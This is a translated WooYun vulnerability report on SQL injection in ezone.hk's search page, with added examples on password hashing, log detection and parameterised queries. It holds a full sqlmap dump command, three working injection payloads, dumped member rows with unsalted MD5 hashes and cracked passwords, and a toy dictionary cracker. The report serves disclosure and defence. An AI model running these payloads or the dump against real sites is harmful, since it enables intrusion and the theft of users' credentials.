
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0155642

Title: SQL injection on the ezone.hk main site (120K users' password hashes, e-mail addresses and login IPs exposed, plus over 2M site access-log rows) (Hong Kong)

Vendor: ezone.hk

Author: 路人甲

Submitted: 2015-11-25 10:07

Fix time: 2015-11-30 10:08

Published: 2015-11-30 10:08

Type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed to a third-party partner organisation (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-25: Details sent to the vendor; awaiting vendor action
2015-11-30: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

ezone.hk (e-zone.com.hk)
Relaunched with a new look, ezone.hk offers one-stop technology news, publishing the latest and hottest tech stories and comprehensive digital intelligence. The "News" section leads with technology, computing, digital and lifestyle news; the "Forum" is a sharing platform where netizens discuss hot tech topics, chat and show off their lifestyle; the "Q&A" section lets netizens swap technical knowledge across four areas such as PC and DIGI and has collected nearly 20,000 items of tech know-how; the "Events" section co-organises or supports events and seminars with many organisations and media outlets and carries the latest industry event news.

Details:

URL: http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag

$ python sqlmap.py -u "http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag" -p keyword --technique=BEU --random-agent --batch -D ez_discuz -T cdb_members -C username,password,email,credits,showemail,lastip --dump --start 1 --stop 10


Database: ez_discuz
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cdb_members | 124189 |
+---------------------------------------+---------+


Database: ez_discuz
Table: cdb_members
[10 entries]
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
| username | password | email | credits | showemail | lastip |
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
| 系統管理員 | d68d9702b299ab9c529b8eae61f1bdb8 | lkjbnm5a6 | 216 | 0 | **.**.**.** |
| u00000004 | 4297f44b13955235245b2497399d7a93 (123123) | aeroplane@**.**.**.** | 0 | 0 | <blank> |
| u00000014 | e10adc3949ba59abbe56e057f20f883e (123456) | joe1@**.**.**.** | 0 | 0 | <blank> |
| u00000018 | f5bb0c8de146c67b44babbf4e6584cc0 (123123123) | fgfdsfs | 0 | 0 | <blank> |
| u00000020 | e10adc3949ba59abbe56e057f20f883e (123456) | pang@**.**.**.** | 0 | 0 | <blank> |
| u00000021 | 4297f44b13955235245b2497399d7a93 (123123) | mailaeroplane@**.**.**.** | 0 | 0 | <blank> |
| u00000024 | 4297f44b13955235245b2497399d7a93 (123123) | info@**.**.**.** | 0 | 0 | <blank> |
| pangpang | e10adc3949ba59abbe56e057f20f883e (123456) | cyp000@**.**.**.** | 3 | 0 | **.**.**.** |
| SuperBO | 596a96cc7bf9108cd896f33c44aedc8a (fuckyou) | larryleung@**.**.**.** | 1184 | 0 | **.**.**.** |
| u00000032 | e10adc3949ba59abbe56e057f20f883e (123456) | ezone1@**.**.**.** | 0 | 0 | <blank> |
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
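Every value sqlmap printed in brackets in the dump above is the plain MD5 of the password: no salt, no iteration, the same 32-character hash for every user who chose 123456. The script below is an added example, not code from the page or from sqlmap: it checks that property against the dumped rows, runs a toy dictionary attack that shows why a single hash table serves all 124,189 accounts, and contrasts it with a per-user salted PBKDF2 store. The wordlist and the storage format are constructed for this example and are not Discuz's own scheme.

```python
import hashlib
import hmac
import os

# Rows taken from the sqlmap dump on this page: (username, stored password
# column, value sqlmap printed in brackets, or None where it recovered nothing).
DUMPED_ROWS = [
    ("系統管理員", "d68d9702b299ab9c529b8eae61f1bdb8", None),
    ("u00000004", "4297f44b13955235245b2497399d7a93", "123123"),
    ("u00000014", "e10adc3949ba59abbe56e057f20f883e", "123456"),
    ("u00000018", "f5bb0c8de146c67b44babbf4e6584cc0", "123123123"),
    ("pangpang", "e10adc3949ba59abbe56e057f20f883e", "123456"),
    ("SuperBO", "596a96cc7bf9108cd896f33c44aedc8a", "fuckyou"),
]

# Constructed toy wordlist standing in for the dictionary sqlmap uses.
WORDLIST = ["password", "123456", "123123", "123123123", "fuckyou", "ezone", "letmein"]


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def store_is_unsalted_md5(rows):
    """True when every value sqlmap printed as cracked is literally
    md5(plaintext), i.e. the password column holds unsalted MD5."""
    return all(md5_hex(plain) == stored for _, stored, plain in rows if plain)


def crack_unsalted_md5(rows, wordlist):
    """Dictionary attack against unsalted MD5. With no salt each word is hashed
    once and the result matches every user who chose it: the two e10adc...
    rows in the dump fall to the same table entry."""
    table = {md5_hex(word): word for word in wordlist}
    return {user: table.get(stored) for user, stored, _ in rows}


# What the column should hold instead: a per-user random salt and a slow KDF.
# Storage format (an assumption made for this example, not Discuz's scheme):
#   pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>
PBKDF2_ITERATIONS = 200_000


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison so verification time does not leak the prefix.
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("password column is unsalted MD5:", store_is_unsalted_md5(DUMPED_ROWS))
    for user, plain in crack_unsalted_md5(DUMPED_ROWS, WORDLIST).items():
        print("%-12s %s" % (user, plain or "<not in wordlist>"))
    a, b = hash_password("123456"), hash_password("123456")
    print("same password, different stored values:", a != b)
```

With a salt per user the attacker has to run the KDF once per guess per account instead of once per guess for the whole table, and the 200,000 PBKDF2 iterations make each of those guesses roughly five orders of magnitude more expensive than one MD5.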


Database: ezonedb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| visit_log | 1112444 |
| doc_questionnaire_reply_answer | 1016913 |
| cms_collect_log | 932428 |
+---------------------------------------+---------+

Proof:

---
Parameter: keyword (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: keyword=-1516') OR 5718=5718#&op=tag
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: keyword=-8131') OR 1 GROUP BY CONCAT(0x7170767071,(SELECT (CASE WHEN (6844=6844) THEN 1 ELSE 0 END)),0x716a6b7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&op=tag
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F') UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x4261544b4854774a524e6d726e667146476e64645357576a666252586d6666587a4e64664b676459,0x716a6b7171),NULL#&op=tag
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user: 'ezuser@**.**.**.**'
current user is DBA: False
database management system users [1]:
[*] 'ezuser'@'**.**.**.**'
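The three payloads sqlmap reported above are distinctive enough to alert on at the web tier even though the `--random-agent` switch in the command hides the tool's User-Agent. The detector below is an added example, not code from the page: it parses Apache combined-format access lines (the server is Apache 2.2.3), percent-decodes every query parameter and matches the decoded value against signatures for the boolean tautology, the FLOOR(RAND(0)*2) error-based trick, the UNION SELECT, and the generic quote-plus-parenthesis breakout all three share. The log lines are constructed for this example (RFC 5737 documentation addresses, a shortened hex marker in the UNION line).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (not from the real server). The
# first three replay the report's sqlmap payloads, percent-encoded the way
# sqlmap sends them; the last two are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [25/Nov/2015:10:01:12 +0800] "GET /search.php?keyword=-1516%27%29%20OR%205718%3D5718%23&op=tag HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36"
203.0.113.10 - - [25/Nov/2015:10:01:13 +0800] "GET /search.php?keyword=-8131%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x7170767071%2C%28SELECT%20%28CASE%20WHEN%20%286844%3D6844%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a6b7171%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23&op=tag HTTP/1.1" 500 712 "-" "Opera/9.80 (X11; Linux i686) Presto/2.12.388"
203.0.113.10 - - [25/Nov/2015:10:01:15 +0800] "GET /search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7170767071%2C0x4261544b4854774a%2C0x716a6b7171%29%2CNULL%23&op=tag HTTP/1.1" 200 6010 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
198.51.100.7 - - [25/Nov/2015:10:02:40 +0800] "GET /search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag HTTP/1.1" 200 5990 "http://ezone.hk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10)"
198.51.100.7 - - [25/Nov/2015:10:02:41 +0800] "GET /viewthread.php?tid=1234&extra=page%3D1 HTTP/1.1" 200 20011 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures run against the percent-decoded parameter value. sqlmap picks
# the numbers in its tautologies at random, so match the shape, not 5718.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bOR\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("quote breakout", re.compile(r"'\s*\)?\s*(?:OR|AND|UNION)\b", re.I)),
]


def classify(value):
    """Names of every signature the decoded value matches."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan(log_text):
    """Parse combined-format lines and report each parameter that looks like
    an injection attempt: who sent it, which script, which parameter, why."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; production code would count these
        url = urlsplit(m["target"])
        # parse_qsl percent-decodes each value, so %27%29 becomes ') here.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            techniques = classify(value)
            if techniques:
                hits.append({"ip": m["ip"], "time": m["ts"], "path": url.path,
                             "param": name, "status": m["status"],
                             "techniques": techniques})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["param"], hit["status"],
              ", ".join(hit["techniques"]))
```

Two things worth noting when turning this into a rule: the error-based probe returns a 500 because MySQL raises the duplicate-key error the technique relies on, so a burst of 500s on search.php from one address is a second, payload-independent signal; and signatures this narrow are for triage, since a real sqlmap run also sends hundreds of tamper variants and time-based probes that these four patterns do not cover.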
Database: ez_discuz
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cdb_posts | 384125 |
| cdb_threads | 271680 |
| cdb_memberfields | 124783 |
| cdb_members | 124189 |
| cdb_attachments | 66407 |
| cdb_mythreads | 58647 |
| cdb_threadtags | 57876 |
| cdb_tags | 14188 |
| cdb_pms | 7667 |
| cdb_onlinetime | 6350 |
| cdb_threadsmod | 2308 |
| cdb_modworks | 1597 |
| cdb_typeoptionvars | 1457 |
| cdb_myposts | 1368 |
| cdb_rsscaches | 1243 |
| cdb_favorites | 330 |
| cdb_polloptions | 295 |
| cdb_access | 284 |
| cdb_words | 251 |
| cdb_settings | 230 |
| cdb_buddys | 179 |
| cdb_statvars | 154 |
| cdb_stats | 136 |
| cdb_forumfields | 123 |
| cdb_forums | 123 |
| cdb_spacecaches | 122 |
| cdb_smilies | 98 |
| cdb_stylevars | 80 |
| cdb_typeoptions | 74 |
| cdb_threadtypes | 71 |
| cdb_ratelog | 69 |
| cdb_polls | 56 |
| cdb_moderators | 49 |
| cdb_banned | 46 |
| cdb_caches | 41 |
| cdb_faqs | 34 |
| cdb_usergroups | 17 |
| cdb_advertisements | 16 |
| cdb_crons | 13 |
| cdb_magics | 12 |
| cdb_projects | 12 |
| cdb_debateposts | 11 |
| cdb_medals | 10 |
| cdb_bbcodes | 9 |
| cdb_typevars | 9 |
| cdb_templates | 8 |
| cdb_pmsearchindex | 6 |
| cdb_ranks | 5 |
| cdb_admingroups | 4 |
| cdb_onlinelist | 4 |
| cdb_subscriptions | 4 |
| cdb_typemodels | 4 |
| cdb_imagetypes | 2 |
| cdb_styles | 2 |
| cdb_adminsessions | 1 |
| cdb_attachtypes | 1 |
| cdb_debates | 1 |
| cdb_failedlogins | 1 |
| cdb_plugins | 1 |
| cdb_promotions | 1 |
| cdb_sessions | 1 |
+---------------------------------------+---------+
Database: ezoneems
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cms_campaign_queue_process | 118687 |
| cms_section_privilege | 129 |
| cms_selection | 80 |
| cms_campaign_job_entry | 33 |
| cms_campaign_job_entry_history | 25 |
| cms_campaign_job_entry_process | 25 |
| cms_campaign_queue_log | 25 |
| cms_section | 19 |
| cms_campaign | 14 |
| cms_m_ezone_job_entry | 13 |
| cms_record_content | 12 |
| cms_block_attachfile | 10 |
| cms_campaign_job | 9 |
| cms_campaign_job_stat | 8 |
| cms_m_ezone_job | 5 |
| cms_admin | 3 |
| cms_lang | 3 |
| cms_no_promote | 3 |
| cms_campaign_recipient | 2 |
| cms_usergroup | 2 |
| cms_campaign_default | 1 |
| cms_edn | 1 |
| cms_mail_bounce_back_pool | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2840 |
| STATISTICS | 555 |
| TABLES | 269 |
| KEY_COLUMN_USAGE | 239 |
| TABLE_CONSTRAINTS | 221 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| SCHEMA_PRIVILEGES | 80 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 5 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: ezonedb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| visit_log | 1112444 |
| doc_questionnaire_reply_answer | 1016913 |
| cms_collect_log | 932428 |
| doc_jetso_reply | 862432 |
| doc_questionnaire_reply_answer_n | 821014 |
| doc_jetso_reply_new | 743044 |
| doc_element_description | 170907 |
| site_user | 128969 |
| site_user_new | 103638 |
| doc_element_image | 87079 |
| doc_questionnaire_reply | 72735 |
| doc_catalog_content | 60796 |
| doc_questionnaire_reply_new | 55566 |
| doc_tag | 48933 |
| site_document | 46368 |
| doc_image | 44882 |
| doc_channelnews_tag | 41445 |
| cms_news | 36010 |
| doc_element_title | 34605 |
| doc_voting_reply | 26049 |
| doc_tag_new | 25694 |
| doc_tips | 23788 |
| doc_event_session_reply | 22553 |
| doc_questionnaire_question_ans | 18177 |
| doc_event_session_reply_new | 17912 |
| site_document_0602 | 17849 |
| cms_weather_data | 12993 |
| doc_tips_new | 11966 |
| doc_upload | 11648 |
| doc_channelnews | 10087 |
| cms_comments | 10033 |
| hits | 7302 |
| doc_tips_reply | 5449 |
| doc_tips_reply_new | 5409 |
| doc_questionnaire_question | 3995 |
| doc_element_testphoto | 3965 |
| cms_source_linkage | 3313 |
| reply_hits | 2513 |
| doc_catalog | 2392 |
| doc_test | 2009 |
| doc_jetso | 1814 |
| doc_voting_answer | 1615 |
| cms_discuz_pool | 1498 |
| doc_banner | 1472 |
| cms_liveblog_post | 1403 |
| doc_forum_reply | 936 |
| doc_event | 736 |
| doc_jetso_announcement | 684 |
| doc_element_testvideo | 398 |
| doc_voting | 316 |
| doc_event_session | 286 |
| doc_questionnaire | 265 |
| doc_wallpaper | 265 |
| doc_forum | 191 |
| doc_program | 124 |
| sys_lookup | 71 |
| doc_element_video | 69 |
| doc_element_textarea | 66 |
| site_workplace | 52 |
| doc_element_video_link | 51 |
| site_application | 50 |
| cms_newsreportor | 38 |
| cms_subchannel | 34 |
| doc_index_layout | 34 |
| sys_applicationtype | 27 |
| doc_video | 23 |
| cms_meta | 13 |
| cms_navigation | 12 |
| cms_source | 12 |
| cms_category | 6 |
| doc_element_attachment | 6 |
| cms_liveblog | 5 |
| cms_usermanagement | 4 |
| doc_event_reply | 2 |
| doc_video_link | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ez_discuz
Table: cdb_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: ez_discuz
Table: cdb_forumfields
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: ezoneems
Table: cms_campaign
[1 column]
+----------------------+-------------+
| Column | Type |
+----------------------+-------------+
| publicreportpassword | varchar(20) |
+----------------------+-------------+
Database: ezoneems
Table: cms_survey
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: ezoneems
Table: cms_member_record
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: ezoneems
Table: cms_campaign_job
[1 column]
+----------------------+-------------+
| Column | Type |
+----------------------+-------------+
| publicreportpassword | varchar(20) |
+----------------------+-------------+
Database: ezoneems
Table: cms_mail_bounce_back_pool
[1 column]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| poolpassword | varchar(255) |
+--------------+--------------+
Database: ezoneems
Table: cms_admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: ezonedb
Table: site_user
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(200) |
+----------+--------------+


Database: ez_discuz
Table: cdb_members
[46 columns]
+--------------+-----------------------+
| Column | Type |
+--------------+-----------------------+
| accessmasks | tinyint(1) |
| adminid | tinyint(1) |
| bday | date |
| credits | int(10) |
| customshow | tinyint(1) unsigned |
| dateformat | tinyint(1) |
| digestposts | smallint(6) unsigned |
| editormode | tinyint(1) unsigned |
| email | char(40) |
| extcredits1 | int(10) |
| extcredits2 | int(10) |
| extcredits3 | int(10) |
| extcredits4 | int(10) |
| extcredits5 | int(10) |
| extcredits6 | int(10) |
| extcredits7 | int(10) |
| extcredits8 | int(10) |
| extgroupids | char(20) |
| gender | tinyint(1) |
| groupexpiry | int(10) unsigned |
| groupid | smallint(6) unsigned |
| invisible | tinyint(1) |
| lastactivity | int(10) unsigned |
| lastip | char(15) |
| lastpost | int(10) unsigned |
| lastvisit | int(10) unsigned |
| newpm | tinyint(1) |
| newsletter | tinyint(1) |
| oltime | smallint(6) unsigned |
| pageviews | mediumint(8) unsigned |
| password | char(32) |
| pmsound | tinyint(1) |
| posts | mediumint(8) unsigned |
| ppp | tinyint(3) unsigned |
| regdate | int(10) unsigned |
| regip | char(15) |
| secques | char(8) |
| showemail | tinyint(1) |
| sigstatus | tinyint(1) |
| styleid | smallint(6) unsigned |
| timeformat | tinyint(1) |
| timeoffset | char(4) |
| tpp | tinyint(3) unsigned |
| uid | mediumint(8) unsigned |
| username | char(15) |
| xspacestatus | tinyint(1) |
+--------------+-----------------------+

Remediation:

Add filtering. More precisely: stop concatenating the keyword parameter of search.php into the SQL string and bind it through a prepared statement; escaping with the driver's quoting function is a fallback, not the fix. Two further points the output above supports. First, cdb_members.password is a bare 32-character MD5 with no salt (sqlmap recovered 123456, 123123 and the like inline while dumping), so the 124,189 hashes should be treated as burned: force a reset and move to a salted, slow hash such as bcrypt or PBKDF2. Second, the single ezuser account behind the forum can also read the ezoneems and ezonedb schemas (visit_log alone holds over 1.1 million rows), so the web application's database account should be limited to the schema it actually needs.
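The `')` suffix on every payload in the proof shows that the keyword from the URL in the details section landed inside a parenthesised, quoted literal that search.php assembled by string concatenation. The model below is an added example, not code from the page or from ezone.hk's search.php (which is PHP on MySQL): it rebuilds that query shape in Python over an in-memory SQLite database with constructed rows, runs the report's boolean and UNION payloads against the concatenated query and against a bound-parameter version, and shows that the fix is where the keyword enters the query, not what characters it contains. Because SQLite has no `#` comment the payloads end in `-- ` instead, and `||` stands in for MySQL's CONCAT(); the table columns are assumed for the example.

```python
import sqlite3

# Constructed rows shaped like the page's cdb_tags / cdb_members tables; none of
# the e-mail addresses or counts are real ezone.hk data.
SCHEMA = """
CREATE TABLE cdb_tags (tagid INTEGER, tagname TEXT, total INTEGER, closed INTEGER);
CREATE TABLE cdb_members (uid INTEGER, username TEXT, password TEXT, email TEXT);
INSERT INTO cdb_tags VALUES (1, '智能手機', 120, 0), (2, 'iPhone', 88, 0), (3, 'Android', 64, 1);
INSERT INTO cdb_members VALUES
  (1, 'admin', 'd68d9702b299ab9c529b8eae61f1bdb8', 'admin@example.invalid'),
  (2, 'pangpang', 'e10adc3949ba59abbe56e057f20f883e', 'pang@example.invalid');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_tags_vulnerable(conn, keyword):
    """Assumed shape of the original query: the user-supplied keyword is pasted
    straight into a quoted, parenthesised literal, which is why a value ending
    in ') closes the literal and the IN (...) and leaves the attacker writing
    the rest of the WHERE clause."""
    sql = ("SELECT tagid, tagname, total, closed FROM cdb_tags "
           "WHERE tagname IN ('%s')" % keyword)
    return conn.execute(sql).fetchall()


def search_tags_fixed(conn, keyword):
    """Same query with the keyword bound as a parameter. The driver hands it
    to the engine as a value, never as SQL text, so quotes, parentheses and
    comment markers inside it are just characters compared against tagname."""
    sql = "SELECT tagid, tagname, total, closed FROM cdb_tags WHERE tagname IN (?)"
    return conn.execute(sql, (keyword,)).fetchall()


# The report's payloads with SQLite syntax: MySQL's '#' comment becomes '-- ',
# and CONCAT() becomes '||'. Four columns, as in sqlmap's UNION finding.
BOOLEAN_PAYLOAD = "-1516') OR 5718=5718-- "
UNION_PAYLOAD = ("智能手機') UNION ALL SELECT NULL,NULL,"
                 "username||':'||password||':'||email,NULL FROM cdb_members-- ")


def demo():
    conn = connect()
    return {
        "benign": search_tags_vulnerable(conn, "智能手機"),
        "boolean_vuln": search_tags_vulnerable(conn, BOOLEAN_PAYLOAD),  # every tag row
        "union_vuln": search_tags_vulnerable(conn, UNION_PAYLOAD),      # tag row + member rows
        "boolean_fixed": search_tags_fixed(conn, BOOLEAN_PAYLOAD),      # no such tag: []
        "union_fixed": search_tags_fixed(conn, UNION_PAYLOAD),          # no such tag: []
        "benign_fixed": search_tags_fixed(conn, "智能手機"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

Escaping the quote with the driver's quoting function would also have stopped these particular payloads, but binding is the change that keeps working when the next developer forgets to escape, or when the value is numeric and no quote is there to escape in the first place.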

Copyright notice: reposts must credit the source, 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: No impact (vendor ignored)

Ignored at: 2015-11-30 10:08

Vendor comment:

Vulnerability rank: 15 (WooYun assessment)

Latest status:

None